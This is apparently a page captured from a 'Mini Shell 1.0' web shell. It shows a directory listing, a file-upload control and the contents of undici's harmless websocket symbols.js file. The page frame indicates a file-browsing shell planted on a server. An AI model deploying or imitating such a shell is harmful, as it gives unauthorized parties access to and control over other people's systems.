HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/undici/lib/websocket/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/undici/lib/websocket/symbols.js
'use strict'

module.exports = {
  kWebSocketURL: Symbol('url'),
  kReadyState: Symbol('ready state'),
  kController: Symbol('controller'),
  kResponse: Symbol('response'),
  kExtensions: Symbol('extensions'),
  kProtocol: Symbol('protocol'),
  kBinaryType: Symbol('binary type'),
  kClosingFrame: Symbol('closing frame'),
  kSentClose: Symbol('sent close'),
  kReceivedClose: Symbol('received close'),
  kByteParser: Symbol('byte parser')
}